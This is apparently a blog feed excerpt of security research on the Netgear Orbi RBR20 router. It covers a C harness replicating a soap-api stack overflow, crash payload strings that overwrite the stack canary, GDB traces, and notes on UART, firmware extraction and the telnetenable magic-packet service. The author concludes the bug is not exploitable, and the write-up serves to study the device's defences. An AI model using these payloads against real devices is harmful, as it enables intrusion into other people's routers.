	<span class="n">var3</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">strstr</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span> <span class="s">"&lt;ResponseCode&gt;"</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">var3</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// if its there, parse some stuff from it (not important right now)</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"[+] found &lt;ResponseCode&gt;, passed check</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
		<span class="n">undef1</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// check if the stack check int was overwritten</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] stack check end: 0x%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">stack_check_val</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
	<span class="c1">// args to pass to target func (replicating original)</span>
	<span class="kt">FILE</span> <span class="o">*</span><span class="n">streams</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="c1">// this will hold the payload (i.e. the Method portion we would submit)</span>
	<span class="c1">// read from env to make testing easier</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">payload</span> <span class="o">=</span> <span class="n">getenv</span><span class="p">(</span><span class="s">"PAYLOAD"</span><span class="p">);</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] payload length: %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">payload</span><span class="p">));</span>

	<span class="c1">// construct the response content the same way the server does in SendSoapRespCode()</span>
	<span class="kt">char</span> <span class="n">resp_b</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
	<span class="n">memset</span><span class="p">(</span><span class="n">resp_b</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">512</span><span class="p">);</span>
  <span class="c1">// this is the fmt string the calling function uses to construct resp</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">resp_fmt</span> <span class="o">=</span> <span class="s">"&lt;m:%sResponse xmlns:m=</span><span class="se">\"</span><span class="s">urn:NETGEAR-ROUTER:service:%s:1</span><span class="se">\"</span><span class="s">&gt;&lt;/m:%sResponse&gt;</span><span class="se">\r\n</span><span class="s">&lt;ResponseCode&gt;%03d&lt;/ResponseCode&gt;</span><span class="se">\r\n</span><span class="s">"</span><span class="p">;</span>
	<span class="n">snprintf</span><span class="p">(</span><span class="n">resp_b</span><span class="p">,</span> <span class="mi">512</span><span class="p">,</span> <span class="n">resp_fmt</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="s">"ConfigSync"</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="mi">404</span><span class="p">);</span>

	<span class="c1">// call the target function with the payload</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] calling target function...</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">replica</span><span class="p">(</span><span class="n">streams</span><span class="p">,</span> <span class="n">resp_b</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I experimented with various payloads using this code and this is when I made a new discovery: different payloads would cause <code class="language-plaintext highlighter-rouge">resp</code> to be corrupted in different ways, which would sometimes result in <code class="language-plaintext highlighter-rouge">resp</code> containing the <em>‘service:’</em> string before the first call to <code class="language-plaintext highlighter-rouge">sscanf()</code> but not after. The output below shows this happening with payload one would assume would definitely pass the string check:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-&gt; % ./replica2
<span class="o">[</span>+] payload length: 130
<span class="o">[</span>+] calling target <span class="k">function</span>...

resp: &lt;m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response xmlns:m<span class="o">=</span><span class="s2">"urn:NETGEAR-ROUTER:service:ConfigSync:1"</span><span class="o">&gt;</span>&lt;/m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAA
AAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response&gt;
&lt;ResponseCode&gt;404&lt;/ResponseCode&gt;

<span class="o">[</span>+] stack check start: 0x313373
<span class="o">[</span>+] sscanf call 1: parse method portion from resp
<span class="o">[</span>+] found <span class="s1">'Response'</span> <span class="k">in </span>method_buf, NULLED
<span class="o">[</span>+] strstr call 1: check <span class="k">for</span> <span class="s1">'service:'</span> <span class="k">in </span>resp
<span class="o">[!]</span> didnt find <span class="s1">'service:'</span>, expect a NULL ptr deref
resp: e:
<span class="o">[</span>+] sscanf call 2: parse ACTION portion from resp
<span class="o">[</span>1]    221258 segmentation fault <span class="o">(</span>core dumped<span class="o">)</span>  ./replica2
</code></pre></div></div>

<p>After some trial and error I eventually found a payload that would successfully overflow <code class="language-plaintext highlighter-rouge">method_buf</code>, avoid the null deref, and overwrite the simulated stack canary:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-&gt; % ./replica2
<span class="o">[</span>+] payload length: 2450
<span class="o">[</span>+] calling target <span class="k">function</span>...

resp: &lt;m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:se

<span class="o">[</span>+] stack check start: 0x313373
<span class="o">[</span>+] sscanf call 1: parse method portion from resp
<span class="o">[</span>+] strstr call 1: check <span class="k">for</span> <span class="s1">'service:'</span> <span class="k">in </span>resp
<span class="o">[</span>+] sscanf call 2: parse ACTION portion from resp
<span class="o">[</span>+] strstr call 2: check <span class="k">for</span> <span class="s1">'&lt;ResponseCode&gt;'</span> <span class="k">in </span>resp
<span class="o">[</span>+] stack check end: 0x63697672
<span class="o">[</span>1]    221814 segmentation fault <span class="o">(</span>core dumped<span class="o">)</span>  ./replica2
</code></pre></div></div>

<p>Nice!</p>

<h3 id="now-against-the-device">now, against the device</h3>

<p>With a new payload in hand, I moved back to testing this against the actual device while attached with GDB. After a bit of tweaking to account for differences in memory layout, I eventually noticed that this payload resulted in the process receiving a SIGKILL and dying rather than triggering the SIGSEGV caused by the null dereference.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaa"
</code></pre></div></div>

<p>I modified the GDB script I had been using to break on <code class="language-plaintext highlighter-rouge">__stack_chk_fail()</code> instead of  <code class="language-plaintext highlighter-rouge">sscanf()</code> to confirm and saw this in the output:</p>

<p><img src="/assets/images/orbi-stackfail.png" alt="stackfail" /></p>

<p>Finally! The null dereference had been avoided and it was the stack canary check failing that was causing the application to die. After all the trouble I’d gone through digging into this bug, that felt <strong><em>goooooood</em></strong>.</p>

<p>I spent a little more time playing with the payload until I found the exact place where the canary overwrite actually happened and trimmed it down to this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:**BBBBBB**"
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 2.1 "soap-api" hit Breakpoint 3, 0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
r0             0x0	0
r1             0xb6f01b65	3069188965
r2             **0x42424242**	1111638594
r3             0x5719b01e	1461301278
r4             0x0	0
r5             0xb6a39214	3064173076
r6             0xb6f2bb80	3069361024
r7             0xbe88e4cc	3196642508
r8             0xbe88e40c	3196642316
r9             0xbe88e3cc	3196642252
r10            0xbe88e3a4	3196642212
r11            0xb6f316fc	3069384444
r12            0xb6f2bc6c	3069361260
sp             0xbe88e388	0xbe88e388
lr             0xb6eb2aa8	-1226102104
pc             0xb69aee40	0xb69aee40 &lt;__stack_chk_fail&gt;
cpsr           0x80000010	-2147483632
0x0:	&lt;error: Cannot access memory at address 0x0&gt;
0xb6f01b65:	""
0x42424242:	&lt;error: Cannot access memory at address **0x42424242**&gt;
0x5719b01e:	&lt;error: Cannot access memory at address 0x5719b01e&gt;
</code></pre></div></div>

<h2 id="stack-canary-bypass-question-mark">stack canary bypass, question mark?</h2>

<p>So, after weeks (months?) of poking at this bug on and off and eventually giving up, I’d come back and managed to get back to square one: a buffer overflow that was triggering the stack check fail and crashing the application. Naturally, the next step was to explore ways to get past the stack canary and see if I could get a working exploit going. I’ve only ever dealt with stack canaries in toy examples so this would be my first time trying against a real target and having to do it with the limited debugging environment only made things more difficult.</p>

<h3 id="a-primer-on-ssp">a primer on SSP</h3>

<p>The Stack Smashing Protector (SSP) is a compiler feature specifically design to detect stack-based buffer overflows and abort the program if one is detected to mitigate the potential effects of the memory corruption. There are various implementations of this feature, but they all follow a similar design: the compiler inserts code that copies a value from a global variable into a local variable (the canary) at the start of a function and code to check that this value still matches the value saved in the global variable at the end of the function, before it returns. If the values do not match, the program is immediately terminated to prevent further execution that could result in undefined behavior. The canary is usually inserted into the stack in such a way that it sits immediately before the return address at the edge of the current function’s stack frame — this means a buffer overflow that has successfully corrupted the return address would have also corrupted the canary value, which would result in the canary check failing and the program being aborted before the function returns and attempts to use the corrupted return address.</p>

<p>For GCC’s <code class="language-plaintext highlighter-rouge">-fstack-protector</code>, for example:</p>

<blockquote>
  <p><em>This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.</em></p>

</blockquote>

<p>It’s important to note one thing: this protection does not <em>prevent</em> overflows from happening — it’s only meant to detect them and try to mitigate against classic stack overflow exploitation. This means that any code that executes after the overflow has occurred but before the end of the function when the canary is check could be affected by the effects of the memory corruption. Modern implementations do a few things to mitigate against this as well, such as reordering of variable declarations to move non-buffer variables ‘above’ overflow-able buffers so that they cannot be (easily) corrupted and placing all buffers together in memory right before the canary and return address to limit the scope of data that can be corrupted and increasing the likelyhood of overflows overwriting the canary value.</p>

<p>Another important point is that the canary value is set at runtime, so it remains the same for the entire lifetime of the application, as well as if the application forks. New processes started via the shell or <code class="language-plaintext highlighter-rouge">execve()</code> will have unique canaries.</p>

<p>I took a look at <code class="language-plaintext highlighter-rouge">arch/arm/include/asm/stackprotector.h</code> in the kernel sources for the kernel used by the device (custom fork of 3.14.77) and found this code, showing that for canary is initialized by XORing random bytes against the value of <code class="language-plaintext highlighter-rouge">LINUX_VERSION_CODE</code> on ARM architectures:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">__always_inline</span> <span class="kt">void</span> <span class="nf">boot_init_stack_canary</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">canary</span><span class="p">;</span>

	<span class="cm">/* Try to get a semi random initial value. */</span>
	<span class="n">get_random_bytes</span><span class="p">(</span><span class="o">&amp;</span><span class="n">canary</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">canary</span><span class="p">));</span>
	<span class="n">canary</span> <span class="o">^=</span> <span class="n">LINUX_VERSION_CODE</span><span class="p">;</span>

	<span class="n">current</span><span class="o">-&gt;</span><span class="n">stack_canary</span> <span class="o">=</span> <span class="n">canary</span><span class="p">;</span>
	<span class="n">__stack_chk_guard</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">stack_canary</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="bruteforcing-i-guessnot">bruteforcing? I guess…not</h3>

<p>Generally speaking, there are two ways of going about bypassing the canary check:</p>

<ul>
  <li>Use a separate memory leak vulnerability to leak the canary value so that it can be correctly overwritten</li>
  <li>Bruteforce the canary byte-by-byte (only works under certain conditions)</li>
</ul>

<p>Since I hadn’t found any ways to leak memory, the only real option I would have is bruteforcing. There’s a specific bruteforcing technique that can greatly reduce the total number of attempts needed to determine the canary value by guessing one byte at a time, using the lack of a crash as an oracle to determine when the correct byte has been guessed and repeating this for each byte of the canary. As mentioned above, this only works under certain conditions: the program must keep the same canary between payloads (i.e. fork-and-accept servers) and the code that reads the payload must not append a NULL byte (e.g.<code class="language-plaintext highlighter-rouge">read</code> / <code class="language-plaintext highlighter-rouge">recv</code>). I found a few good resources that helped me better understand this concept such as this <a href="https://www.youtube.com/watch?v=01EX0mjya5A">LiveOverflow video</a> and this <a href="https://ctf101.org/binary-exploitation/stack-canaries/">CTF guide</a> (screenshot below taken from here)</p>

<p><img src="/assets/images/orbi-brute.png" alt="bruteforcing" /></p>

<p>Seems easy enough, right? I went back to the device and determined the minimum length to overflow the buffer and trigger the stack check fail was 209 characters. After sending only a couple of requests and watching the values in the debugger I quickly realized this wasn’t going to work at all.</p>

<p>The output belows shows the debugger breaking at the start of <code class="language-plaintext highlighter-rouge">__stack_chk_fail()</code> with <code class="language-plaintext highlighter-rouge">r2</code> containing the local copy of the stack canary that has been overwritten by a single byte and <code class="language-plaintext highlighter-rouge">r3</code> containing the original. As you can see, the byte that was written was <code class="language-plaintext highlighter-rouge">00</code> (NULL) — the function that reads the payload into the buffer (<code class="language-plaintext highlighter-rouge">sscanf()</code>) appends a NULL. So, the first condition for this to be viable is out.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 2.1 "soap-api" hit Breakpoint 2, 0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
No symbol table info available.
Backtrace stopped: Cannot access memory at address 0x4f532f34
Stack level 0, frame at 0xbecd34c8:
 pc = 0xb698be40 in __stack_chk_fail; saved pc = 0xb6e8faa8
 Outermost frame: Cannot access memory at address 0x4f532f34
 Arglist at 0xbecd34c8, args:
 Locals at 0xbecd34c8, Previous frame's sp is 0xbecd34c8
r0             0x0      0
r1             0xb6edeb65       3069045605
**r2             0xb710d200       3071332864**
r3             0xb710d29e       3071333022
r4             0x0      0
r5             0xb6a16214       3064029716
r6             0xb6f08b80       3069217664
r7             0xbecd360c       3201119756
r8             0xbecd354c       3201119564
r9             0xbecd350c       3201119500
r10            0xbecd34e4       3201119460
r11            0xb6f0e6fc       3069241084
r12            0xb6f08c6c       3069217900
sp             0xbecd34c8       0xbecd34c8
lr             0xb6e8faa8       -1226245464
pc             0xb698be40       0xb698be40 &lt;__stack_chk_fail&gt;
cpsr           0x80000010       -2147483632
</code></pre></div></div>

<p>Not only that, the canary value was changing in between each request. In retrospect, this is obvious since <code class="language-plaintext highlighter-rouge">soap-api</code> is not forking itself to handle the requests, but instead being <code class="language-plaintext highlighter-rouge">execve</code>‘ed at some point after <code class="language-plaintext highlighter-rouge">lighttpd</code> forks.</p>

<p>So, yeah — (smarter) bruteforcing was out of the question. Since along the way I’d also learned PIE and RELRO was enabled on the binary, I called it quits at this point and feel pretty confident in saying this isn’t an exploitable issue.</p>

<h2 id="conclusion">conclusion</h2>

<p>This turned out to be a long journey that gave me a chance to become more familiar with some of the internals of this system. It also forced me to get creative in finding ways to debug and test things out, which taught me some new tricks. In the end, I was able to definitively confirm the buffer overflow could be reached, but the mitigations in place combined with the nuances of the environment proved to be enough to thwart my exploitation attempts.</p>

<p>Alas, this is the life of security research — sometimes, even when you’ve found the bug, there’s still no guarantee you’ll be able to exploit it.</p>

<h2 id="references">references</h2>

<ul>
  <li><a href="https://www.sans.org/blog/stack-canaries-gingerly-sidestepping-the-cage/">Stack Canaries – Gingerly Sidestepping the Cage</a> [2021]</li>
  <li><a href="https://www.youtube.com/watch?v=01EX0mjya5A">LiveOverflow video</a></li>
  <li><a href="https://ctf101.org/binary-exploitation/stack-canaries/">CTF guide</a> on stack canaries</li>
  <li><a href="https://bananamafia.dev/post/binary-canary-bruteforce/">Bruteforcing x86 Stack Canaries</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="research" /><category term="bug-hunting" /><category term="triage" /><category term="orbi" /><category term="netgear" /><category term="iot" /><summary type="html"><![CDATA[a walkthrough of my experience finding a buffer overflow, discovering a null pointer deref along the way, and eventually figuring out the bug wasn't (easily) exploitable.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/orbi-connect.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/orbi-connect.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">orbi hunting 0x0: introduction, UART access, recon</title><link href="https://blog.coffinsec.com/research/2022/06/12/orbi-hunting-0-intro-uart.html" rel="alternate" type="text/html" title="orbi hunting 0x0: introduction, UART access, recon" /><published>2022-06-12T00:00:00+00:00</published><updated>2022-06-12T00:00:00+00:00</updated><id>https://blog.coffinsec.com/research/2022/06/12/orbi-hunting-0-intro-uart</id><content type="html" xml:base="https://blog.coffinsec.com/research/2022/06/12/orbi-hunting-0-intro-uart.html"><![CDATA[<p>I’ve been hunting for bugs on the Netgear Orbi (RBR20) for about a year and half now. This is the first in a series of posts where I’ll be publishing my notes and findings from this research. This post provides an high-level overview of the system and notes on getting serial console access via UART.</p>

<h2 id="introduction">Introduction</h2>
<p>I wanted to upgrade the WiFi at home a few years ago and ended up purchasing one of Netgear’s Orbi line of mesh WiFi routers. After about a year I ended doing a ‘<em>real</em>’ upgrade to some Ubiquiti equipment, so I had this Orbi just laying around and decided to use it as a target for bug hunting. I’ve done a bit of research against IoT devices in the past and wanted something new to look into. I’ve now been hunting on this device for about a year and half, walking away and coming back to it multiple times, and sometimes going months without doing anything with it. Over this time I’ve explored a few angles and documented quite a bit of it so I thought I’d just start dumping some of this information here, mostly in the hopes that it may be useful to anyone else in the future who may be interested in doing their own hunting on this device.</p>

<!-- ![shell](/assets/images/orbi-connect.png){:style="display:block; margin-left:auto; margin-right:auto"} -->

<p><strong>Minor disclaimer:</strong> This series of posts may be a bit disjointed and may not always provide much of a narrative. As mentioned above, it’s meant to be a data dump and not so much a walkthrough of every step I took along the way. Where possible I’ll provide context around how I came to certain conclusions, why I decided to look in a particular area, and any other information that I think may be useful to others.</p>

<h2 id="overview">Overview</h2>

<h3 id="system-details">System Details</h3>

<ul>
  <li><strong>Device:</strong> Netgear Orbi (RBR20)</li>
  <li><strong>Firmware Version(s):</strong>
    <ul>
      <li><code class="language-plaintext highlighter-rouge">2.5.1.16</code> (<a href="https://www.downloads.netgear.com/files/GDC/RBR20/RBR20-V2.5.1.16.zip">Download</a>)</li>
      <li><code class="language-plaintext highlighter-rouge">2.7.33</code> (<a href="https://www.downloads.netgear.com/files/GDC/RBR20/RBR20-V2.7.3.22.zip">Download</a>)</li>
    </ul>
  </li>
  <li><strong>Architecture:</strong> ARMv7 rev 5</li>
  <li><strong>Kernel:</strong> <code class="language-plaintext highlighter-rouge">Linux RBR20 3.14.77 #2 SMP PREEMPT</code></li>
  <li><strong>OS:</strong> Customized OpenWRT Chaos Calmer image</li>
</ul>

<h3 id="hardware-details">Hardware Details</h3>
<h4 id="basic-specs">Basic Specs</h4>
<ul>
  <li>Processor: Quad-Core ARM Cortex-A7, Qualcomm</li>
  <li>Memory: 1GB RAM</li>
  <li>Storage: 512MB NAND flash</li>
  <li>Radio: 2.4Ghz + 5Ghz wireless</li>
</ul>

<h4 id="board-layout-and-components">Board Layout and Components</h4>

<p>I took a look at the <a href="https://fccid.io/PY317400402">FCC listing</a> for this particular device and reviewing the internal photographs but soon discovered that the images on this site didn’t exactly match my device and certain components were either different brands/devices or missing entirely from the images compared to my actual device. In any case, this still provided a good point of reference that would help with getting a general understanding of where things were supposed to be.</p>

<p>The top of the PCB exposes the following components:</p>
<ul>
  <li>BLE + Wifi SoC</li>
  <li>CPU (beneath a shield)</li>
  <li>Voltage regulator</li>
  <li>RJ45 ports</li>
  <li>Power input</li>
  <li>UART pins</li>
</ul>

<p>The bottom side of the PCB:</p>

<ul>
  <li>Winbond NAND flash</li>
  <li>NANYA DRAM</li>
</ul>

<p><img src="/assets/images/orbi-hw1.png" alt="top" /> <img src="/assets/images/orbi-hw2.png" alt="bottom" /></p>

<h3 id="firmware-extraction">Firmware Extraction</h3>

<p>I used <code class="language-plaintext highlighter-rouge">binwalk</code> to extract the root filesystem from the firmware images provided by Netgear. This successfully extracted the embedded squashfs filesystem.</p>

<p>Below is a listing of the root directory from the extracted filesystem:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>drwxr-xr-x  3 builder builder  4096 Feb 13 02:20 __rd_debug_only
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 bin
<span class="nt">-rw-r--r--</span>  1 builder builder     9 Feb 13 00:47 cloud_version
drwxr-xr-x  3 builder builder  4096 Feb 13 02:20 data
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 dev
drwxr-xr-x 33 builder builder  4096 Feb 13 02:20 etc
<span class="nt">-rw-r--r--</span>  1 builder builder    11 Feb 13 00:47 firmware_language_version
<span class="nt">-rw-r--r--</span>  1 builder builder     1 Feb 13 00:47 firmware_region
<span class="nt">-rw-r--r--</span>  1 builder builder    29 Feb 13 00:47 firmware_time
<span class="nt">-rw-r--r--</span>  1 builder builder    10 Feb 13 00:47 firmware_version
<span class="nt">-rw-r--r--</span>  1 builder builder    11 Feb 13 00:47 flash_type
<span class="nt">-rw-r--r--</span>  1 builder builder    11 Feb 13 00:47 hardware_version
lrwxrwxrwx  1 builder builder     4 Feb 13 00:47 home -&gt; /tmp
<span class="nt">-rw-r--r--</span>  1 builder builder    31 Feb 13 00:47 hw_id
drwxr-xr-x 18 builder builder  4096 Feb 13 02:20 lib
lrwxrwxrwx  1 builder builder     8 Feb 13 00:47 mnt -&gt; /tmp/mnt
<span class="nt">-rw-r--r--</span>  1 builder builder     6 Feb 13 00:47 module_name
drwxr-xr-x  5 builder builder  4096 Feb 13 02:20 opt
lrwxrwxrwx  1 builder builder    12 Feb 13 00:47 overlay -&gt; /tmp/overlay
drwxr-xr-x  2 builder builder  4096 Feb 13 00:47 proc
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 rom
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 root
drwxr-xr-x  3 builder builder 12288 Feb 13 02:20 sbin
drwxr-xr-x  2 builder builder  4096 Feb 13 00:47 sys
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 tmp
drwxr-xr-x  9 builder builder  4096 Feb 13 02:20 usr
lrwxrwxrwx  1 builder builder     4 Feb 13 00:47 var -&gt; /tmp
drwxr-xr-x 14 builder builder 57344 Feb 13 02:20 www
</code></pre></div></div>

<h3 id="gpl-code">GPL Code</h3>

<p>Apart from the files from extracted firmware images, I also downloaded the GPL code for each of the firmware versions I looked at. Download links for these packages can be found on <a href="https://kb.netgear.com/2649/NETGEAR-Open-Source-Code-for-Programmers-GPL">this page</a> for Netgear, though most vendors provide these packages as required by the license. They include source code all GPL code they use and/or modified to create the system.</p>

<ul>
  <li><a href="https://www.downloads.netgear.com/files/GPL/Orbi-Micro-V2.5.1.16_gpl_src.tar.bz2.zip">GPL Code for v2.5.1.16</a></li>
  <li><a href="https://www.downloads.netgear.com/files/GPL/orbi-micro-V2.7.3.22_gpl_src.tar.bz2.zip">GPL Code for v2.7.33</a></li>
</ul>

<p>The majority of the custom code/interesting files are located under the <code class="language-plaintext highlighter-rouge">git_home</code> directory of the extracted archive (which is an OpenWrt buildroot directory).</p>

<p>Note: While having vendors provide their modified code sounds great in theory, the reality is a little different. For example, the GPL packages for the Orbi include a lot of source code, but specific open source applications they made modified copies of are given in binary form only.</p>

<p><br /></p>

<h2 id="firmware-25116-vs-2733-changes">Firmware 2.5.1.16 vs. 2.7.33 Changes</h2>

<p>There are a couple of important things that changed between these two firmware versions that I want to mention here.</p>

<h3 id="easy-telnet-access-removed">(Easy) Telnet Access Removed</h3>

<p>First, in the older version it was possible to enable Telnet access via the hidden debug page at <code class="language-plaintext highlighter-rouge">http://&lt;orbi&gt;/debug_detail.htm</code> when logged in as the admin user. This was removed in the later version and it is no longer trivial to enable Telnet. There does appear to still be Netgear’s custom Telnet server <code class="language-plaintext highlighter-rouge">telnetenable</code> that listens on UDP port 23 and will only “activate” upon receiving a ‘magic’ packet containing username/pass and other info in a specific format (see <a href="https://github.com/insanid/netgear-telenetenable">here</a>).</p>

<p>The code for this binary is included in the GPL packages. Version 2.5.x seems to have only allowed the use of this feature if the Region was set to Chinese and the Region file contained “WW” (shown below). The 2.7.x version doesn’t include this check and simply compares the received data against a local version it constructs (the main server loop is shown below):</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="k">for</span> <span class="p">(;;)</span> <span class="p">{</span>
		<span class="n">FD_ZERO</span><span class="p">(</span><span class="o">&amp;</span><span class="n">readable</span><span class="p">);</span>
		<span class="n">FD_SET</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">readable</span><span class="p">);</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">select</span><span class="p">(</span><span class="n">fd</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">readable</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span>
			<span class="k">continue</span><span class="p">;</span>

		<span class="n">slen</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr_in</span><span class="p">);</span>
		<span class="n">r</span> <span class="o">=</span> <span class="n">recvfrom</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">rbuf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">rbuf</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">from</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">slen</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">r</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span>
			<span class="k">continue</span><span class="p">;</span>

		<span class="n">datasize</span> <span class="o">=</span> <span class="n">fill_payload</span><span class="p">(</span><span class="n">output_buf</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">r</span> <span class="o">==</span> <span class="n">datasize</span> <span class="o">&amp;&amp;</span> <span class="n">memcmp</span><span class="p">(</span><span class="n">rbuf</span><span class="p">,</span> <span class="n">output_buf</span><span class="p">,</span> <span class="n">r</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
			<span class="cm">/* maybe it's better to judge whether utelnetd is running in real time here */</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">telnet_enabled</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
				<span class="n">printf</span><span class="p">(</span><span class="s">"The telnet server is enabled now!!!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
				<span class="n">system</span><span class="p">(</span><span class="n">TELNET_CMD</span><span class="p">);</span>
				<span class="n">telnet_enabled</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
			<span class="p">}</span>
			<span class="n">sendto</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">ack</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">from</span><span class="p">,</span> <span class="n">slen</span><span class="p">);</span>
		<span class="p">}</span>
	<span class="p">}</span>
</code></pre></div></div>

<p>Even so, I’ve yet to successfully enable Telnet even when using known-good credentials with either the telnet version linked above or my own customized version of the code included in the GPL packages.</p>

<h3 id="binaries-in-gpl-packages-stripped">Binaries in GPL Packages Stripped</h3>

<p>The earlier version of GPL code package provided binaries that had not been stripped of debug symbols, making reverse engineering of these specific applications much easier. They’re still useful for reversing newer binaries though as most functions are still intact and knowing exactly what everything should be called always helps.</p>

